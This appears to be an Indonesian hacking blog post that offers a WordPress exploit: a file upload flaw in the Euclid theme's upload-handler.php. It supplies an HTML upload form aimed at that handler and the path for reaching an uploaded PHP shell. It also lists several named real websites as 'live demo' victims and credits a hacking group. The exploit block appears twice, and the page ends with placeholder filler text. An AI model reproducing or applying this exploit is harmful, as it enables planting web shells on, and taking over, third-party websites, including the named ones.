Disini sayaakan share exploit untuk wordpress. Exploit yang ampuh untuk Wordpress ini saya share hanya di blog saya. Ga usah basa basi ini dia Exploitnya :
CSRF File Upload Vulnerability
#Dork :
Exploit & POC :
http://site-target/wp-content/themes/euclid/functions/upload-handler.php
http://site-target/wp-content/themes/euclid_v1.x.x/functions/upload-handler.php
Script :
<form enctype="multipart/form-data"
action="http://127.0.0.1/wp-content/themes/euclid/functions/upload-handler.php" method="post">
Your File: <input name="uploadfile" type="file" /><br />
<input type="submit" value="upload" />
</form>
File Access :
http://site-target/uploads/[years]/[month]/your_shell.php
Contoh : http://127.0.0.1/wp-content/uploads/2013/11/mbt.php
Live Demo :
http://www.on2art.com/
http://rapidmaintenanceuk.com/
http://cbaydeluxeresort.com/
http://abovethemoon.com/
http://education-maroc.com/
Thx to : Indonesian Cyber army and Erza Jullian
CSRF File Upload Vulnerability
#Dork :
Exploit & POC :
http://site-target/wp-content/themes/euclid/functions/upload-handler.php
http://site-target/wp-content/themes/euclid_v1.x.x/functions/upload-handler.php
Script :
<form enctype="multipart/form-data"
action="http://127.0.0.1/wp-content/themes/euclid/functions/upload-handler.php" method="post">
Your File: <input name="uploadfile" type="file" /><br />
<input type="submit" value="upload" />
</form>
File Access :
http://site-target/uploads/[years]/[month]/your_shell.php
Contoh : http://127.0.0.1/wp-content/uploads/2013/11/mbt.php
Live Demo :
http://www.on2art.com/
http://rapidmaintenanceuk.com/
http://cbaydeluxeresort.com/
http://abovethemoon.com/
http://education-maroc.com/
Thx to : Indonesian Cyber army and Erza Jullian
This is dummy text. It is not meant to be read. Accordingly, it is difficult to figure out when to end it. But then, this is dummy text. It is not meant to be read. Period.
ConversionConversion EmoticonEmoticon